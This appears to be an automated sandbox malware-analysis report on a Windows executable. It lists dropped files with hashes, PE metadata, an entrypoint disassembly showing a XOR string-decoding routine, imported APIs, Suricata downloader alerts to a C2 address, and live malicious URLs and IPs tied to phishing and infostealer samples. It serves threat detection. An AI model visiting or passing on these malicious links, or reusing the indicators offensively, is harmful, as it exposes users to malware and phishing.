                                                                                                                                                                                                            https://u1404228.ct.sendgrid.net/ls/click?upn=u001.53NsXfgUBOeYzK87Mt8UmmFmJrZ7XUeaM2H1JJzIOlLD8XdRMGUjLjiETSkkNSOO1aPcOhsB-2B6p58337PPTvLBJHf93ZwdhKuc0pYJ3CCFhPzGYkRFXax0jGvIeRFmcP5G0BUyJ6YhdCuxj2rmKfEA3sfYg2UNxl72w1Me3oPfdrF6jbhGk315PA9TABMIUQaw-2BWiKWUThNlxL-2FiIJdoH5tiTQT-2Bm8o6f2DtPJqJqYyOmKsC6Z8r8BDMH-2BRyR0DPAbc1o4jsJAeLDJ31LwWjsFQYr3zFK5cIf8Mbd-2BRzOeXFDSMm6es3Y0fepvpPG5r7pfagssMFSYnyu8MHsVv5hRcIKJqjAZyLx1ckeV-2FaCznPfw8naJb82iSt3TNueNL1vH7DevWmKVRPxk4wZ5wzTJXKbWW9anlXuh-2BQXFzp8R8-2BdEEizEjCv3UcDuHMQ1pDH865wy4DUZnYMpZjJQJPawcQswhgRnWgvPzhIRyQE-2Bc-3DkIeO_CR4Iv1KReyG-2BUTiHEM2iSrmxUTGCd7nll-2F8pyW4fRHUIiL68JldL5hjEvlqIxpWk9hPYxNH8eo9VRHfVERALBwpMyAhjDc4FUwScFs2ucRUabaJ73tdO-2FPebairfMf4xwZ2dpDlmkqO5pmgc1gE0gGghSpi3dDGJNhz4YymAGUOPzRzAYltzk0Ba7IAVZeXH7Jn8rume2KIoU57-2Fl62ae-2FaTXSu1TIVQ6Migf-2F6NGXqO6vztNaikiQe23mzDzfi19JJ-2FVN5j6ZPVhD34lLHzKpdiifzixAZur7VZCR5Hc24MfYQGTYVbJWBIhMdpT2lgG-2Bg-2FTIWWIZlY-2Fzm-2BK3i-2F0Q-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 139.162.185.155
                                                                                                                                                                                                            PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • 45.33.6.223
                                                                                                                                                                                                            Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                            • 45.33.2.79
                                                                                                                                                                                                            firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 45.56.79.23
                                                                                                                                                                                                            firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 178.79.128.206
                                                                                                                                                                                                            HETZNER-ASDEEy6iI0wxsf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 88.198.29.97
                                                                                                                                                                                                            http://ayushmangupta01.github.io/Netflix_clone_mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 78.46.22.25
                                                                                                                                                                                                            http://www.jazeegroup.com/new_salary_increment_notification_secured_document.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 135.181.164.29
                                                                                                                                                                                                            Client.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                            • 195.201.57.90
                                                                                                                                                                                                            z3bqnf1WvW.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                            • 178.63.51.126
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                            • 5.75.214.132
                                                                                                                                                                                                            http://e95lq1vmgxojxrxkv7.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 195.201.57.90
                                                                                                                                                                                                            https://infognition.com/ScreenPressor/ScreenPressor4.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 78.47.156.184
                                                                                                                                                                                                            bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 144.76.166.199
                                                                                                                                                                                                            bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 159.69.63.226
                                                                                                                                                                                                            AKAMAI-ASN1EUEy6iI0wxsf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.234.222.143
                                                                                                                                                                                                            SecuriteInfo.com.ELF.Mirai-CTV.17056.24722.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.236.28.137
                                                                                                                                                                                                            http://cremis.co.jp/oscommerce/catalog/redirect.php?action=url&goto=m8746liv.dallasnews24.comhttps://ohyeah.jp/redirect.php?action=url&goto=google.com.////amp/chungcusungrouphalong.vn/log/5QpvB8K2/ZWdheXRhbkBpZHNyZWFsZXN0YXRlLmNvbQ==$%E3%80%82&c=E,1,WIsK-Pp3fpUtsfHSA8-xzLJpUhIWthdkIPcm9_R7RXGcgUnYnPVSB6XUBjqIvsMquxANN6Vw0E_RWm4aP1d6oCkGO5HUfUouEOY2VUcZ&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 172.233.39.205
                                                                                                                                                                                                            Play_VM-NowBarry.doanAudiowav012.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.197.127.142
                                                                                                                                                                                                            Amex Message.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 23.55.163.73
                                                                                                                                                                                                            https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFkILOsO1UnLItklUwD68rhtr94fRPJI4HAEjYZ7vdlgHTiHU_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZPRzSyzWe4FlQQyqQA-2BOTqGjWjoN-2BuPm4tzM5LM6f6tO2PXKa74YSjAhzL6onG-2BuKO989bZZj9vupVvXtBWU0qXeI6VZny9p-2FgjssbU9Je1I2RDoZPOLgxX8gxf2-2BzsuoGYoVqnaS5CYR1Z5WEWAcZP0wmQbm4ikqer-2BGrlVppyDdPw-2BxPiObQZTbU2ZeclEy9V5nUC-2BnwlvdDmQwsjghHkHuJFiwInVWpyiCgGFo0uYjlPs3G8hdAgJBJu-2F-2B0K864-3D#ZmluYW5jZUBjbGVhcnZpZXcuYWk=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 184.50.204.201
                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.200.0.42
                                                                                                                                                                                                            https://icrealtime.com/downloads/2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 88.221.110.145
                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.200.0.9
                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.200.0.9

                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\osgobah.dll

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25600
                                                                                                                                                                                                            Entropy (8bit):6.020686022652244
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:PXd6ULZam2bCNifL0/QzGMqGEN4fn7NgjNdUPjQ2fu/MB8TMxs1wHMkGPMlj1ju:PXjLZJ2bXfqQKMq+gjTAfu/MB8QKpKB
                                                                                                                                                                                                            MD5:EB9474598B42C55CC62D098B8C5D8B7E
                                                                                                                                                                                                            SHA1:1D73F3DA3C1BA4DEA3EE051E41CF8B991685B8EF
                                                                                                                                                                                                            SHA-256:7CD473A4B131E8BEB8F9BAAE5876D47A74D7DFE0AD76B5F189DDE8FBE0285E91
                                                                                                                                                                                                            SHA-512:E6D84DC5C513AA41ED053BA2BC113346D7CAEC5D782871A5D72803C64B3D54B93236F1563B1FA545590FE72EA80DA5DFD78ED5CD7C59FA2C921CEF34AA2FC54E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.H...........#...8.@... .......D.......P................................................ .........................1.......L...............................\....................................................................................text...(?.......@.................. ..`.data...@....P.......D..............@....rdata.......`.......L..............@..@.bss.........p...........................edata..1............X..............@..@.idata..L............Z..............@....reloc..\............`..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\tmp5C6F.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):106721
                                                                                                                                                                                                            Entropy (8bit):6.251254904812791
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:uxd9IKubv9svDzhki7tomuNF5KF9/+ePitXid:iIvbvKrN7nuN/MlPGXid
                                                                                                                                                                                                            MD5:EE8AF7D7567529B836A77DCC1E7563BD
                                                                                                                                                                                                            SHA1:7A88819F0A2B8F281C483E44C3C28837612C88AF
                                                                                                                                                                                                            SHA-256:D6FBB0A8DF363116EB204ADAAC708BD38E1A4697F4481408114A55146456B090
                                                                                                                                                                                                            SHA-512:E608DACE9DEFDDB9A99B794D050E74E4ED20BF4486E8798C30DA9395D496339C890218D6FCAFEF2684645333DE7D492F06642416FBECD1D6517C7A806A65A225
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:..`.............H..........................................p.....J..D.=.H.=................................................2.].....................^.....................................................y..........................................$..........................................................................................................................(....................................Pl.......P....................0.......................................................................p..0.......$.............................0........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Windows\SysWOW64\edsuvoov-usum.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\5SGOAKv7AR.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):106721
                                                                                                                                                                                                            Entropy (8bit):6.2512549048127966
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:BteqKDlXvCDB04f5Gn/L8NRel15weLTK/m4ebueX0G1BX:alg35GT9Zwc4mbyo
                                                                                                                                                                                                            MD5:36EC3A51B474CF8210BC02444A290499
                                                                                                                                                                                                            SHA1:86F147291649382BADBBEA123BC94FBAB1167770
                                                                                                                                                                                                            SHA-256:71D84A18E3CBA7A496B6E2A4AB14EC7F6B5C82D7D9FA9B86863E23B7161886CE
                                                                                                                                                                                                            SHA-512:05D3DAA701D634FB122E7A877DE88DF1F7D9C436E0608262695393F483E65CF1033D8AC3BC065C12F2D9274E2136FDE6ECC2C0C50BDEEC3C30019F5D58E5C1E7
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 84%
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.H...............8.X...........:.......p....@..........................@......r......... ..............................0.......................................................................................................................text....W.......`.................. ..`.data........p.......p..............@....rdata..`...........................@..@.bss....p.... ....... ...................idata.......0.......0..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Windows\SysWOW64\ehmehut.dll

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                                                            Entropy (8bit):3.4855350111432437
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:6/bHgJ2GVhcus1lli4NbE2eMGjofSA8YDITcSd3MA3MMIv0BvcvXQ3:yAJ2G6Vx5EUGU6wIASdcAcHvA3
                                                                                                                                                                                                            MD5:F37B21C00FD81BD93C89CE741A88F183
                                                                                                                                                                                                            SHA1:B2796500597C68E2F5638E1101B46EAF32676C1C
                                                                                                                                                                                                            SHA-256:76CF016FD77CB5A06C6ED4674DDC2345E8390C010CF344491A6E742BAF2C0FB0
                                                                                                                                                                                                            SHA-512:252FE66DEA9A4B9AEBC5FD2F24434719CB25159BA51549D9DE407F44B6A2F7BCE6E071BE02C4F2AD6AEF588C77F12C00ED415EB54F96DEC1B077326E101CE0F4
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ao.H...........#...8..................... ...............................`................ ......................0..5....@...............................P..@....................................................................................text............................... ..`.data...`.... ......................@....edata..5....0......................@..@.idata.......@......................@....reloc..@....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                            Entropy (8bit):6.2512549048127966
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                            File name:5SGOAKv7AR.exe
                                                                                                                                                                                                            File size:106'721 bytes
                                                                                                                                                                                                            MD5:36ec3a51b474cf8210bc02444a290499
                                                                                                                                                                                                            SHA1:86f147291649382badbbea123bc94fbab1167770
                                                                                                                                                                                                            SHA256:71d84a18e3cba7a496b6e2a4ab14ec7f6b5c82d7d9fa9b86863e23b7161886ce
                                                                                                                                                                                                            SHA512:05d3daa701d634fb122e7a877de88df1f7d9c436e0608262695393f483e65cf1033d8ac3bc065c12f2d9274e2136fde6ecc2c0c50bdeec3c30019f5d58e5c1e7
                                                                                                                                                                                                            SSDEEP:1536:BteqKDlXvCDB04f5Gn/L8NRel15weLTK/m4ebueX0G1BX:alg35GT9Zwc4mbyo
                                                                                                                                                                                                            TLSH:DBA35B4DABFE0172C5F407B818B78BBDDEB7F631B1229787A3D5599E04C9201891E31A
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.H...............8.X...........:.......p....@..........................@......r......... ............................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Entrypoint:0x403a19
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                            Time Stamp:0x48AD4CC2 [Thu Aug 21 11:08:50 2008 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:c1246ca9ec291149221a5cbc329bf1a2

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            mov eax, 0000148Ch
                                                                                                                                                                                                            call 00007F48AC6B371Eh
                                                                                                                                                                                                            call 00007F48AC6B3959h
                                                                                                                                                                                                            mov dword ptr [00412270h], eax
                                                                                                                                                                                                            mov dword ptr [004120D0h], 00000094h
                                                                                                                                                                                                            sub esp, 0Ch
                                                                                                                                                                                                            push 004120D0h
                                                                                                                                                                                                            call 00007F48AC6B3945h
                                                                                                                                                                                                            mov eax, 00000000h
                                                                                                                                                                                                            add esp, 0Ch
                                                                                                                                                                                                            xor byte ptr [eax+00407000h], FFFFFFD4h
                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                            cmp eax, 06h
                                                                                                                                                                                                            jne 00007F48AC6B0D15h
                                                                                                                                                                                                            mov al, 00h
                                                                                                                                                                                                            xor byte ptr [eax+00407007h], FFFFFFD4h
                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                            cmp eax, 0Ch
                                                                                                                                                                                                            jne 00007F48AC6B0D15h
                                                                                                                                                                                                            sub esp, 0Ch
                                                                                                                                                                                                            push 00407007h
                                                                                                                                                                                                            call 00007F48AC6B38B4h
                                                                                                                                                                                                            mov ebx, eax
                                                                                                                                                                                                            add esp, 0Ch
                                                                                                                                                                                                            cmp dword ptr [004120E0h], 02h
                                                                                                                                                                                                            je 00007F48AC6B0D55h
                                                                                                                                                                                                            mov eax, 00000000h
                                                                                                                                                                                                            xor byte ptr [eax+00407014h], FFFFFFD4h
                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                            cmp eax, 16h
                                                                                                                                                                                                            jne 00007F48AC6B0D15h
                                                                                                                                                                                                            sub esp, 08h
                                                                                                                                                                                                            push 00407014h
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            call 00007F48AC6B38EEh
                                                                                                                                                                                                            add esp, 08h
                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                            je 00007F48AC6B0D2Eh
                                                                                                                                                                                                            sub esp, 08h
                                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                                            push 00000000h
                                                                                                                                                                                                            call eax
                                                                                                                                                                                                            add esp, 08h
                                                                                                                                                                                                            sub esp, 04h
                                                                                                                                                                                                            push 00000104h
                                                                                                                                                                                                            lea eax, dword ptr [esp+00001390h]
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push 00000000h
                                                                                                                                                                                                            call 00007F48AC6B38CCh
                                                                                                                                                                                                            add esp, 04h
                                                                                                                                                                                                            call 00007F48AC6B38CCh
                                                                                                                                                                                                            mov edx, 00407000h
                                                                                                                                                                                                            call 00007F48AC6BE255h

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x130000x8d4.idata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x57d80x60004c4ef859e1d9380b34ec090f88cc4c25False0.4677734375data5.742590786826368IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .data0x70000x9ca00xa0003e153b868c425786d014d6dd057dd2dbFalse0.4489990234375data5.829445124935704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rdata0x110000x5600x1000a8ae9b29f26dc7c53d6b8b923fbacc7aFalse0.32421875data3.2085085907294957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .bss0x120000x3700x1000cd1864334dcbe28ebc6d838ee80548e8False0.03564453125data0.28026180020774066IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .idata0x130000x8d40x10002f8cdbdf29f8b4f2e3247269124b0ae8False0.3046875data3.6908917321230708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            ADVAPI32.DLLRegCloseKey, RegCreateKeyA, RegCreateKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, RegSetValueExW
                                                                                                                                                                                                            KERNEL32.dllCloseHandle, CreateFileA, CreateMutexA, CreateProcessA, CreateThread, CreateToolhelp32Snapshot, DeleteFileA, ExitProcess, ExpandEnvironmentStringsA, GetCommandLineA, GetComputerNameA, GetCurrentProcessId, GetCurrentThreadId, GetFileSize, GetFileTime, GetLastError, GetModuleFileNameA, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetSystemDirectoryA, GetSystemTimeAsFileTime, GetTempFileNameA, GetTempPathA, GetTickCount, GetVersionExA, HeapAlloc, HeapFree, HeapReAlloc, LoadLibraryA, OpenProcess, Process32First, Process32Next, ReadFile, SetFileAttributesA, SetFilePointer, SetFileTime, SetPriorityClass, Sleep, TerminateProcess, VirtualAlloc, WaitForSingleObject, WriteFile, lstrcatA, lstrcmpiA, lstrcpyA, lstrlenA
                                                                                                                                                                                                            USER32.dllExitWindowsEx, wsprintfA
                                                                                                                                                                                                            WS2_32.DLLWSAGetLastError, WSAStartup, closesocket, connect, gethostbyname, getsockopt, htons, inet_addr, ioctlsocket, recv, select, send, socket

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-09-07T15:34:00.578045+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.349711172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:02.076876+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.349714172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:03.385889+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.349717172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:04.549358+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.349720172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:07.602203+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.349723172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:09.377835+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.349727172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:10.782137+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.349730172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:11.943025+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.360144172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:14.444162+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.360147172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:16.063797+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.360150172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:17.710181+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.360153172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:21.125373+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.360156172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:22.269473+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.360159172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:27.974081+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361353172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:29.285083+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361356172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:31.589262+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361359172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:33.497866+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361362172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:35.500892+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361365172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:37.722425+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361368172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:39.301067+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361371172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:40.427839+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361374172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:41.571898+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361377172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:44.768083+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361380172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:46.821951+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361383172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:47.972475+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361386172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:50.366734+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361390172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:52.160381+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361393172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:56.866690+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361396172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:57.993794+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361399172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:34:59.721753+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361402172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:35:00.943860+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361405172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:35:02.750202+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361408172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:35:08.437881+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361411172.234.222.13880TCP
                                                                                                                                                                                                            2024-09-07T15:35:10.098969+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.361414172.234.222.13880TCP
